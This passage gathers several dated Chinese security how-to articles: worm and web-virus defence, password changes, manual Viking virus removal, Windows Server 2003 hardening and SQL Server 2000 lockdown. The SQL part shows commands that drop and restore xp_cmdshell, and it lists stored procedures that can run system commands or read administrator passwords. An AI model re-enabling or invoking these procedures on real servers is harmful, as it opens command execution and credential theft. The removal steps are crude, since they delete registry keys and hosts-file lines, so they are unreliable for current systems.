(1)購合適的殺毒軟件！網絡蠕蟲病毒的發展已經使傳統的殺毒軟件的“文件級實時監控系統”落伍，殺毒軟件必須向內存實時監控和郵件實時監控發展！另外面對防不勝防的網頁病毒，也使得用戶對殺毒軟件的要求越來越高！在殺毒軟件市場上，賽門鐵克公司的norton系列殺毒軟件在全球具有很大的比例！經過多項測試，norton殺毒系列軟件腳本和蠕蟲阻攔技術能夠阻擋大部分電子郵件病毒，而且對網頁病毒也有相當強的防范能力!目前國內的殺毒軟件也具有了相當高的水平。像瑞星，kv系列等殺毒軟件，在殺毒軟件的同時整合了防火強功能，從而對蠕蟲兼木馬程序有很大克制作用。

(2)經常升級病毒庫，殺毒軟件對病毒的查殺是以病毒的特征碼為依據的，而病毒每天都層出不窮，尤其是在網絡時代，蠕蟲病毒的傳播速度快，變種多，所以必須隨時更新病毒庫，以便能夠查殺最新的病毒!

(3)提高防殺毒意識.不要輕易去點擊陌生的站點，有可能里面就含有惡意代碼！

當運行IE時，點擊“工具→Internet選項→安全→ Internet區域的安全級別”，把安全級別由“中”改為“高” 。因為這一類網頁主要是含有惡意代碼的ActiveX或Applet、 JavaScript的網頁文件 ，所以在IE設置中將ActiveX插件和控件、Java腳本等全部禁止就可以大大減少被網頁惡意代碼感染的幾率。具體方案是：在IE窗口中點擊“工具”→“Internet選項”，在彈出的對話框中選擇“安全”標簽，再點擊“自定義級別”按鈕，就會彈出“安全設置”對話框，把其中所有ActiveX插件和控件以及與Java相關全部選項選擇“禁用”。但是，這樣做在以后的網頁瀏覽過程中有可能會使一些正常應用ActiveX的網站無法瀏覽。

(4)不隨意查看陌生郵件，尤其是帶有附件的郵件，由于有的病毒郵件能夠利用ie和outlook的漏洞自動執行，所以計算機用戶需要升級ie和outlook程序，及常用的其他應用程序！

三、小結

網絡蠕蟲病毒作為一種互聯網高速發展下的一種新型病毒，必將對網絡產生巨大的危險。在防御上，已經不再是由單獨的殺毒廠商所能夠解決，而需要網絡安全公司，系統廠商，防病毒廠商及用戶共同參與，構筑全方位的防范體系！

蠕蟲和黑客技術的結合，使得對蠕蟲的分析，檢測和防范具有一定的難度，同時對蠕蟲的網絡傳播性，網絡流量特性建立數學模型也是有待研究的工作！

現在是密碼的時代，QQ、MSN、郵箱、系統、RAR、ZIP、Word、Excel、網上銀行、論壇密碼等等。密碼無處不在，可以給我們更多的安全。但它在給我們必要的安全保障的同時，一旦密碼丟失或被盜，則會給我們帶來很多的麻煩。為此我們有必要將一些常用的密碼定期更新，這樣才能夠永保安全！

問：我使用的是Windows XP，請問怎樣修改用戶密碼，以便不讓人猜測到？

答：選擇“我的電腦→控制面板→管理工具→計算機管理”，打開“計算機管理”窗口，依次展開“計算機管理（本地）→系統工具→本地用戶和組→用戶”，在右側右擊自己的賬戶，選擇“設置密碼”命令，再在打開的窗口中設置密碼即可。如果你是系統管理員，還可以修改別的賬戶密碼。

問：我的MSN上保存了不少聯系人，如果密碼丟失，重新申請MSN的話，要一一重新添加聯系人，則會給自己帶來很多的麻煩。如何修改密碼？

答：打開瀏覽器，再定位到http://www.hotmail.com，然后在其中輸入你的MSN用戶名和密碼，再單擊“文件→轉到→我的電子郵件信箱”，打開電子郵件頁面后，單擊右上角的“選項”按鈕，然后單擊“個人”鏈接打開“個人選項”頁面，單擊“密碼”進入MSN的頁面登錄，輸入正確的當前MSN的用戶名和密碼后，即可進入“更改密碼”頁面，輸入舊密碼和新密碼就可以修改成功。

問：我的郵箱中有不少重要的商業信函，擔心密碼過于簡單而被競爭對手收到里面的信件，如何修改密碼？

答：一般登錄郵箱提供商的相關頁面進行修改，以126信箱為例。登錄http://www.126.com，然后輸入用戶名和密碼，再單擊上方的“選項→修改密碼”，然后輸入舊密碼和新密碼就可以修改成功。如果是新浪郵箱，進入后，單擊“設置區”，進入設置區頁面，單擊“用戶密碼設置”，根據提示一步一步即可完成密碼修改。如果你使用公司架設的郵箱，則可以詢問網管員，然后再登錄相應網頁進行郵箱密碼的修改。

問：我的上網密碼比較簡單（默認是提供商提供的），而且我不是包月用戶，擔心別人會用我的賬號，造成費用損失，如何修改密碼呢？

答：如果需要修改上網密碼，一般登錄ISP主頁，然后選擇即可，如北京的ADSL用戶，可以登錄http://202.106.46.39:9001/selfadsl/login.html，然后單擊“客戶口令更改”進行修改。如果你是北京電信的用戶，可以登錄http://www.bjnet.net.cn，單擊“自服務系統”，然后輸入原先的用戶名和密碼，進入后即可修改密碼，這樣做擔心別人會盜用他人用戶名和密碼，從而造成損失。

不過，如果你是小區寬帶，那可能要請你與小區物業機房人員聯系修改密碼。

　病毒表現:

　　1. 某些殺毒軟件的實時監控無法啟動(例如:瑞星的實時監控中心)

　　2. 部分圖標變得模糊

　　3. 進程里面出現例如 Logo_1.exe , 0Sy.exe等莫名其妙的東西

　　4. C盤隱藏文件出現 _desktop.ini(隱藏文件)

　　5. 磁盤的autorun被修改，以至于雙擊磁盤盤符時提示出錯

　　隨即用瑞星2006的殺毒軟件進行殺毒，但是無法徹底清除。這是感染了"威金"病毒。

　　清除方法:

　　1 結束以下進程： logo1_.exe rundl132.exe(注意第六個為數字1而不是L) explorer.exe(該病毒會把vDll.dll加載到該系統進程中去，最好是用進程管理工具直接結束掉這個DLL)另外有類似OS.exe的進程也一并結束掉~~！

　　2.到windows目錄刪除"logo1_.exe"、"rundl132.exe"、"vdll.dll"文件！（注意這些進程都是隱藏的，需要把系統設置為“顯示隱藏文件”，設置的方法：打開“我的電腦”； 依次打開菜單“工具/文件夾選項”；然后在彈出的“文件夾選項”對話框中切換到“查看”頁； 去掉“隱藏受保護的操作系統文件(推薦)”前面的對鉤，讓它變為不選狀態； 在下面的“高級設置”列表框中改變“不顯示隱藏的文件
和文件夾”選項為“顯示所有文件和文件夾”選項； 去掉“隱藏已知文件類型的擴展名”前面的對鉤，也讓它變為不選狀態；最后點擊“確定”。 ）

　　3 .運行 gpedit.msc 打開組策略,依次單擊用戶配置- 管理模塊- 系統-指定不給windows運行的程序,點啟用 然后 點顯示 添加 logo1_exe 也就是病毒的源文件

　　4 找到并刪除%Windir%下的Logo1_.exe、rundl132.exe、vDll.dll文件，其中vDll.dll可能在其他目錄中，%Windir%默認為C:\Windows或者C:\Winnt。打開注冊表，索引到HKEY_LOCAL_MACHINE\Software\Soft\DownloadWWW，刪除auto鍵值；
打開注冊表，索引到HKEY_CURRENT_USER\Software\Microsoft\Windows
NT\CurrentVersion\WIndows，刪除load鍵值；打開%system%\drivers\etc下hosts文件，刪除“127.0.0.1 localhost”一行后所有內容；

　　.在windows目錄下新建文件："logo1_.exe"、"rundl132.exe"、"vdll.dll"并把屬性設為“只讀”，這樣病毒也就無法運行了

　　現在你的電腦基本上說可以對該病毒免疫了，既使中了該病毒，它也發作不了啦！最后這一點不怎么好辦

　　那些應用程序都被感染了病毒，如果中了病毒，下次重啟后，就會彈出來“rundl132.exe不是有效的應用程序”和“無法加載注冊表中c;\windows\rundl132.exe”的對話框要么刪除所有被感染的應用程序，然后從其它地方復制沒感染病毒的過來，要么就是在搜索里用“*.exe”找出所有的exe文件，然后每個運行一下:L最后從注冊表里找出“rundl132.exe”的啟動項，刪掉就OK了沒必要大驚小怪的.更不用什么扒網線關門殺毒.

Windows Server 2003是大家最常用的服務器操作系統之一。雖然它提供了強大的網絡服務功能，并且簡單易用，但它的安全性一直困擾著眾多網管，如何在充分利用Windows Server 2003提供的各種服務的同時，保證服務器的安全穩定運行，最大限度地抵御病毒和黑客的入侵。Windows Server 2003 SP1中文版補丁包的發布，恰好解決這個問題，它不但提供了對系統漏洞的修復，還新增了很多易用的安全功能，如安全配置向導（SCW）功能。利用SCW功能的“安全策略”可以最大限度增強服務器的安全，并且配置過程非常簡單，下面就一起來看吧！

　　厲兵秣馬 先裝“SCW”

　　大家都很清楚，Windows Server 2003系統為增強其安全性，默認情況下，很多服務組件是不被安裝的，要想使用，必須手工安裝。“SCW”功能也是一樣，雖然你已經成功安裝了補丁包SP1，但也需要手工安裝“安全配置向導（SCW）”組件。

　　進入“控制面板”后，運行“添加或刪除程序”，然后切換到“添加/刪除Windows組件”頁。下面在“Windows組件向導”對話框中選中“安全配置向導”選項，最后點擊“下一步”按鈕后，就能輕松完成“SCW”組件的安裝。

　　安裝過程就這么簡單，接下來就能根據自身需要，利用“SCW”配置安全策略，增強Windows Server 2003服務器安全。

　　配置“安全策略” 原來如此“簡單”

　　在Windows Server 2003服務器中，點擊“開始→運行”后，在運行對話框中執行“SCW.exe”命令，就會彈出“安全配置向導”對話框，開始你的安全策略配置過程。當然你也可以進入“控制面板→管理工具”窗口后，執行“安全配置向導”快捷方式來啟用“SCW”。

　　1．新建第一個“安全策略”

　　如果你是第一次使用“SCW”功能，首先要為Windows Server 2003服務器新建一個安全策略，安全策略信息是被保存在格式為XML 的文件中的，并且它的默認存儲位置是“C:\WINDOWS\security\msscw\Policies”。因此一個Windows Server 2003系統可以根據不同需要，創建多個“安全策略”文件，并且還可以對安全策略文件進行修改，但一次只能應用其中一個安全策略。

　　在“歡迎使用安全配置向導”對話框中點擊“下一步”按鈕，進入到“配置操作”對話框，因為是第一次使用“SCW”，這里要選擇“創建新的安全策略”單選項，點擊“下一步”按鈕，就開始配置安全策略。

　　2．輕松配置“角色”

　　首先進入“選擇服務器”對話框，在“服務器”欄中輸入要進行安全配置的Windows Server 2003服務器的機器名或IP地址，點擊“下一步”按鈕后，“安全配置向導”會處理安全配置數據庫。

　　接著就進入到“基于角色的服務配置”對話框。在基于角色的服務配置中，可以對Windows Server 2003服務器角色、客戶端角色、系統服務、應用程序，以及管理選項等內容進行配置。

　　所謂服務器“角色”，其實就是提供各種服務的Windows Server 2003服務器，如文件服務器、打印服務器、DNS服務器和DHCP服務器等 ， 一個Windows Server 2003服務器可以只提供一種服務器“角色”，也可以扮演多種服務器角色。點擊“下一步”按鈕后，就進入到“選擇服務器角色”配置對話框，這時需要在“服務器角色列表框”中勾選你的Windows Server 2003服務器所扮演的角色。

　　注意：為了保證服務器的安全，只勾選你所需要的服務器角色即可，選擇多余的服務器角色選項，會增加Windows Server 2003系統的安全隱患。如筆者的Windows Server 2003服務器只是作為文件服務器使用，這時只要選擇“文件服務器”選項即可。

　　進入“選擇客戶端功能”標簽頁，來配置Windows Server 2003服務器支持的“客戶端功能”，其實Windows Server 2003服務器的客戶端功能也很好理解，服務器在提供各種網絡服務的同時，也需要一些客戶端功能的支持才行，如Microsoft網絡客戶端、DHCP客戶端和FTP客戶端等。根據需要，在列表框中勾選你所需的客戶端功能即可，同樣，對于不需要的客戶端功能選項，建議你一定要取消對它的選擇。

　　接下來進入到“選擇管理和其它選項”對話框，在這里選擇你需要的一些Windows Server 2003系統提供的管理和服務功能，操作方法是一樣的，只要在列表框中勾選你需要的管理選項即可。點擊“下一步”后，還要配置一些Windows Server 2003系統的額外服務，這些額外服務一般都是第三方軟件提供的服務。

　　然后進入到“處理未指定的服務”對話框，這里“未指定服務”是指，如果此安全策略文件被應用到其它Windows Server 2003服務器中，而這個服務器中提供的一些服務沒有在安全配置數據庫中列出，那么這些沒被列出的服務該在什么狀態下運行呢？在這里就可以指定它們的運行狀態，建議大家選中“不更改此服務的啟用模式”單選項。最后進入到“確認服務更改”對話框，對你的配置進行最終確認后，就完成了基于角色的服務配置。

3．配置網絡安全

　　以上完成了基于角色的服務配置。但Windows Server 2003服務器包含的各種服務，都是通過某個或某些端口來提供服務內容的，為了保證服務器的安全，Windows防火墻默認是不會開放這些服務端口的。下面就可以通過“網絡安全”配置向導開放各項服務所需的端口，這種向導化配置過程與手工配置Windows防火墻相比，更加簡單、方便和安全。

　　在“網絡安全”對話框中，要開放選中的服務器角色，Windows Server 2003系統提供的管理功能以及第三方軟件提供的服務所使用的端口。點擊“下一步”按鈕后，在“打開端口并允許應用程序”對話框中開放所需的端口，如FTP服務器所需的“20和21”端口，IIS服務所需的“80”端口等，這里要切記“最小化”原則，只要在列表框中選擇要必須開放的端口選項即可，最后確認端口配置，這里要注意：其它不需要使用的端口，建議大家不要開放，以免給Windows Server 2003服務器造成安全隱患。

　　4．注冊表設置

　　Windows Server 2003服務器在網絡中為用戶提供各種服務，但用戶與服務器的通信中很有可能包含“不懷好意”的訪問，如黑客和病毒攻擊。如何保證服務器的安全，最大限度地限制非法用戶訪問，通過“注冊表設置”向導就能輕松實現。

　　利用注冊表設置向導，修改Windows Server 2003服務器注冊表中某些特殊的鍵值，來嚴格限制用戶的訪問權限。用戶只要根據設置向導提示，以及服務器的服務需要，分別對“要求SMB安全簽名”、“出站身份驗證方法”、“入站身份驗證方法”進行嚴格設置，就能最大限度保證Windows Server 2003服務器的安全運行，并且免去手工修改注冊表的麻煩。

　　5．啟用“審核策略”

　　聰明的網管會利用日志功能來分析服務器的運行狀況，因此適當的啟用審核策略是非常重要的。SCW功能也充分的考慮到這些，利用向導化的操作就能輕松啟用審核策略。

　　在“系統審核策略”配置對話框中要合理選擇審核目標，畢竟日志記錄過多的事件會影響服務器的性能，因此建議用戶選擇“審核成功的操作”選項。當然如果有特殊需要，也可以選擇其它選項。如“不審核”或“審核成功或不成功的操作”選項。

　　6．增強IIS安全

　　IIS服務器是網絡中最為廣泛應用的一種服務，也是Windows系統中最易受攻擊的服務。如何來保證IIS服務器的安全運行，最大限度免受黑客和病毒的攻擊，這也是SCW功能要解決的一個問題。利用“安全配置向導”可以輕松的增強IIS服務器的安全，保證其穩定、安全運行。

　　在“Internet信息服務”配置對話框中，通過配置向導，來選擇你要啟用的Web服務擴展、要保持的虛擬目錄，以及設置匿名用戶對內容文件的寫權限。這樣IIS服務器的安全性就大大增強。

　　小提示：如果你的Windows Server 2003服務器沒有安裝、運行IIS服務，則在SCW配置過程中不會出現IIS安全配置部分。

　　完成以上幾步配置后，進入到保存安全策略對話框，首先在“安全策略文件名”對話框中為你配置的安全策略起個名字，最后在“應用安全策略”對話框中選擇“現在應用”選項，使配置的安全策略立即生效。

　　利用SCW增強Windows Server 2003服務器的安全性能就這么簡單，所有的參數配置都是通過向導化對話框完成的，免去了手工繁瑣的配置過程，SCW功能的確是安全性和易用性有效的結合點。如果你的Windows Server 2003系統已經安裝了SP1補丁包，不妨試試SCW吧！

數據庫是電子商務、金融以及ERP系統的基礎，通常都保存著重要的商業伙伴和客戶信息。大多數企業、組織以及政府部門的電子數據都保存在各種數據庫中，他們用這些數據庫保存一些個人資料，比如員工薪水、個人資料等等。數據庫服務器還掌握著敏感的金融數據。包括交易記錄、商業事務和帳號數據，戰略上的或者專業的信息，比如專利和工程數據，甚至市場計劃等等應該保護起來防止競爭者和其他非法者獲取的資料。數據完整性和合法存取會受到很多方面的安全威脅，包括密碼策略、系統后門、數據庫操作以及本身的安全方案。但是數據庫通常沒有象操作系統和網絡這樣在安全性上受到重視。 　　

　　微軟的SQL Server是一種廣泛使用的數據庫，很多電子商務網站、企業內部信息化平臺等都是基于SQL Server上的，但是數據庫的安全性還沒有被人們更系統的安全性等同起來，多數管理員認為只要把網絡和操作系統的安全搞好了，那么所有的應用程序也就安全了。大多數系統管理員對數據庫不熟悉而數據庫管理員有對安全問題關心太少，而且一些安全公司也忽略數據庫安全，這就使數據庫的安全問題更加嚴峻了。數據庫系統中存在的安全漏洞和不當的配置通常會造成嚴重的后果，而且都難以發現。數據庫應用程序通常同操作系統的最高管理員密切相關。廣泛SQL Server數據庫又是屬于“端口”型的數據庫，這就表示任何人都能夠用分析工具試圖連接到數據庫上，從而繞過操作系統的安全機制，進而闖入系統、破壞和竊取數據資料，甚至破壞整個系統。 　　

　　這里，我們主要談論有關SQL Server2000數據庫的安全配置以及一些相關的安全和使用上的問題。 　　

　　在進行SQL Server 2000數據庫的安全配置之前，首先你必須對操作系統進行安全配置，保證你的操作系統處于安全狀態。然后對你要使用的操作數據庫軟件（程序）進行必要的安全審核，比如對ASP、PHP等腳本，這是很多基于數據庫的WEB應用常出現的安全隱患，對于腳本主要是一個過濾問題，需要過濾一些類似 , ‘ ; @ / 等字符，防止破壞者構造惡意的SQL語句。接著，安裝SQL Server2000后請打上補丁sp1以及最新的sp2。

　　下載地址是：http://www.microsoft.com/sql/downloads/2000/sp1.asp　和　http://www.microsoft.com/sql/downloads/2000/sp2.asp 　　

　　在做完上面三步基礎之后，我們再來討論SQL Server的安全配置。 　　

　　1、使用安全的密碼策略

　　我們把密碼策略擺在所有安全配置的第一步，請注意，很多數據庫帳號的密碼過于簡單，這跟系統密碼過于簡單是一個道理。對于sa更應該注意，同時不要讓sa帳號的密碼寫于應用程序或者腳本中。健壯的密碼是安全的第一步！ 　　

　　SQL Server2000安裝的時候，如果是使用混合模式，那么就需要輸入sa的密碼，除非你確認必須使用空密碼。這比以前的版本有所改進。

　　同時養成定期修改密碼的好習慣。數據庫管理員應該定期查看是否有不符合密碼要求的帳號。比如使用下面的SQL語句：

　　Use master

　　Select name,Password from syslogins where password is null 　　

　　2、使用安全的帳號策略　　

　　由于SQL Server不能更改sa用戶名稱，也不能刪除這個超級用戶，所以，我們必須對這個帳號進行最強的保護，當然，包括使用一個非常強壯的密碼，最好不要在數據庫應用中使用sa帳號，只有當沒有其它方法登錄到 SQL Server 實例（例如，當其它系統管理員不可用或忘記了密碼）時才使用 sa。建議數據庫管理員新建立一個擁有與sa一樣權限的超級用戶來管理數據庫。安全的帳號策略還包括不要讓管理員權限的帳號泛濫。

　　SQL Server的認證模式有Windows身份認證和混合身份認證兩種。如果數據庫管理員不希望操作系統管理員來通過操作系統登陸來接觸數據庫的話，可以在帳號管理中把系統帳號“BUILTINAdministrators”刪除。不過這樣做的結果是一旦sa帳號忘記密碼的話，就沒有辦法來恢復了。

　　很多主機使用數據庫應用只是用來做查詢、修改等簡單功能的，請根據實際需要分配帳號，并賦予僅僅能夠滿足應用要求和需要的權限。比如，只要查詢功能的，那么就使用一個簡單的public帳號能夠select就可以了。 　

　　3、加強數據庫日志的記錄　　

　　審核數據庫登錄事件的“失敗和成功”，在實例屬性中選擇“安全性”，將其中的審核級別選定為全部，這樣在數據庫系統和操作系統日志里面，就詳細記錄了所有帳號的登錄事件。

　　請定期查看SQL Server日志檢查是否有可疑的登錄事件發生，或者使用DOS命令。

　　findstr /C:"登錄" d:Microsoft SQL ServerMSSQLLOG*.*

4、管理擴展存儲過程

　　對存儲過程進行大手術，并且對帳號調用擴展存儲過程的權限要慎重。其實在多數應用中根本用不到多少系統的存儲過程，而SQL Server的這么多系統存儲過程只是用來適應廣大用戶需求的，所以請刪除不必要的存儲過程，因為有些系統的存儲過程能很容易地被人利用起來提升權限或進行破壞。

　　如果你不需要擴展存儲過程xp_cmdshell請把它去掉。使用這個SQL語句：

　　use master

　　sp_dropextendedproc 'xp_cmdshell'

　　xp_cmdshell是進入操作系統的最佳捷徑，是數據庫留給操作系統的一個大后門。如果你需要這個存儲過程，請用這個語句也可以恢復過來。

　　sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' 　　

　　如果你不需要請丟棄OLE自動存儲過程（會造成管理器中的某些特征不能使用），這些過程包括如下：

　　Sp_OACreate Sp_OADestroy Sp_OAGetErrorInfo Sp_OAGetProperty

　　Sp_OAMethod Sp_OASetProperty Sp_OAStop

　　去掉不需要的注冊表訪問的存儲過程，注冊表存儲過程甚至能夠讀出操作系統管理員的密碼來，如下：

　　Xp_regaddmultistring Xp_regdeletekey Xp_regdeletevalue Xp_regenumvalues

　　Xp_regread Xp_regremovemultistring Xp_regwrite

　　還有一些其他的擴展存儲過程，你也最好檢查檢查。

　　在處理存儲過程的時候，請確認一下，避免造成對數據庫或應用程序的傷害。 　

　　5、使用協議加密　

　　SQL Server 2000使用的Tabular Data Stream協議來進行網絡數據交換，如果不加密的話，所有的網絡傳輸都是明文的，包括密碼、數據庫內容等等，這是一個很大的安全威脅。能被人在網絡中截獲到他們需要的東西，包括數據庫帳號和密碼。所以，在條件容許情況下，最好使用SSL來加密協議，當然，你需要一個證書來支持。 　

　　6、不要讓人隨便探測到你的TCP/IP端口 　　

　　默認情況下，SQL Server使用1433端口監聽，很多人都說SQL Server配置的時候要把這個端口改變，這樣別人就不能很容易地知道使用的什么端口了。可惜，通過微軟未公開的1434端口的UDP探測可以很容易知道SQL Server使用的什么TCP/IP端口了。 　　

　　不過微軟還是考慮到了這個問題，畢竟公開而且開放的端口會引起不必要的麻煩。在實例屬性中選擇TCP/IP協議的屬性。選擇隱藏 SQL Server 實例。如果隱藏了 SQL Server 實例，則將禁止對試圖枚舉網絡上現有的 SQL Server 實例的客戶端所發出的廣播作出響應。這樣，別人就不能用1434來探測你的TCP/IP端口了（除非用Port Scan）。 　　

　　7、修改TCP/IP使用的端口

　　請在上一步配置的基礎上，更改原默認的1433端口。在實例屬性中選擇網絡配置中的TCP/IP協議的屬性，將TCP/IP使用的默認端口變為其他端口。 　　

　　8、拒絕來自1434端口的探測 　　

　　由于1434端口探測沒有限制，能夠被別人探測到一些數據庫信息，而且還可能遭到DOS攻擊讓數據庫服務器的CPU負荷增大，所以對Windows 2000操作系統來說，在IPSec過濾拒絕掉1434端口的UDP通訊，可以盡可能地隱藏你的SQL Server。

　　9、對網絡連接進行IP限制 　

　　SQL Server 2000數據庫系統本身沒有提供網絡連接的安全解決辦法，但是Windows 2000提供了這樣的安全機制。使用操作系統自己的IPSec可以實現IP數據包的安全性。請對IP連接進行限制，只保證自己的IP能夠訪問，也拒絕其他IP進行的端口連接，把來自網絡上的安全威脅進行有效的控制。

　　關于IPSec的使用請參看：http://www.microsoft.com/china/technet/security/ipsecloc.asp

　　上面主要介紹的一些SQL Server的安全配置，經過以上的配置，可以讓SQL Server本身具備足夠的安全防范能力。當然，更主要的還是要加強內部的安全控制和管理員的安全培訓，而且安全性問題是一個長期的解決過程，還需要以后進行更多的安全維護。

近來，威金變種病毒肆虐，不少人中招后被迫格式化所有分區，苦心保存的數據毀于一旦。

中了這種病毒的特征是：系統響應緩慢，玩網絡游戲時會自動退出，硬盤里的EXE文件圖標會變“花”；到dos下用ghost恢復系統失敗；如果不全盤格式化，重裝系統也不能解決問題。

今天有幸遇到感染此種病毒的電腦，在機主幾乎絕望的情況下清除了病毒，挽救了他多年積累的數據。
現在，偶把此次殺毒的過程貼上來，供遇到類似問題的網友參考。

清除病毒的步驟如下：

一、結束病毒進程，刪除病毒的啟動項。
1、開機按F8鍵，進安全模式；

2、按Ctrl+Alt+Del打開“任務管理器”，結束Logo1和Rundll32進程；

3、我的電腦→屬性→系統還原，勾選“在所有驅動器上關閉系統還原”，“確定”；（如果原來已經關閉了系統還原，這一步可略）

4、右擊“我的電腦”→資源管理器→工具→文件夾選項→查看，去掉“隱藏受保護的操作系統（推薦）”前面的√，選“顯示所有文件和文件夾”；
在左邊“文件夾”框中依次點Documents and Settings→用戶帳戶名→Local Settings→Temp；
用鼠標點一下右邊的任何地方，再點“編輯”→全部選定，然后按Shift+Delete來刪除TEMP文件夾下的所有文件。

5、開始→運行，鍵入msconfig，打開“系統配置實用程序”界面，點“啟動”，找出可疑的啟動項，如“命令”項有windows\rundll32.exe、windows\logo1.exe，windows\down\rundll32.exe等的啟動項；再回到第4步里的“資源管理器”界面，找到rundll32.exe、logo1.exe并刪除；

6、再運行regedit打開注冊表，編輯→查找，鍵入run，并勾選“全字匹配”，然后開始查找，如果看到run項中有可疑的、指向上述病毒的鍵值，則刪除該鍵（注意：不是刪除run項），按F3繼續查找，刪除與病毒有關的鍵，直至查找完畢；

7、點“開始”→搜索→文件或文件夾→所有文件和文件夾，最大化窗口，文件名欄填“_desktop.ini” ， “更多高級選項”中勾選“搜索系統文件夾”、“搜索隱藏的文件和文件夾”、“搜索子文件夾” ，然后點“搜索”，搜索完后，單擊“編輯”→全部選定，再按Shift+Delete刪除所有找到的“_desktop.ini文件。

經過上述處理后，即使重啟系統，病毒一般不會隨系統而啟動了。為了保險起見，可以在第5步中點“服務”，勾選“隱藏所有Microsoft服務”，把所有項目前面的√去掉（如果是殺毒軟件的，到系統正常后再恢復就可以了）；

二、下載專殺工具，清除病毒，挽救硬盤數據
重啟系統，再次按F8鍵，選“帶網絡的安全模式”（正常啟動也可以，但為保險起見，還是進入安全模式），打開IE，登錄“江民(www.jiangmin.com)網站”或“瑞星(www.rising.com.cn)網站”，下載威金專殺工具，保存到“桌面”或其它地方，下載完后，運行它，便進入了清除病毒的過程。

過一段時間后，病毒就清除完畢。再重啟系統，系統就正常了，所有EXE文件也可以用了。

再強調一下，上述是有關“威金變種病毒”的查殺方法，很多人可能同時也中了其它病毒，因此，建議在處理“威金變種病毒”后，安裝殺毒軟件，升級病毒庫，進行全盤殺毒。